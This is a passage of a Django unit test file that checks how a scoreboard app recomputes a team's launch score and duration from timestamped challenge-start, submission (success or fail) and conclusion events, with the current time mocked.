team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 3
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 3
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 2
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 2
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 57, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 5
expectedDuration_s = 130
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 57, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 128
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessOneFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 4
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessOneFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 4
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 3
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 3
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 7
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 7
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 4
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 4
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
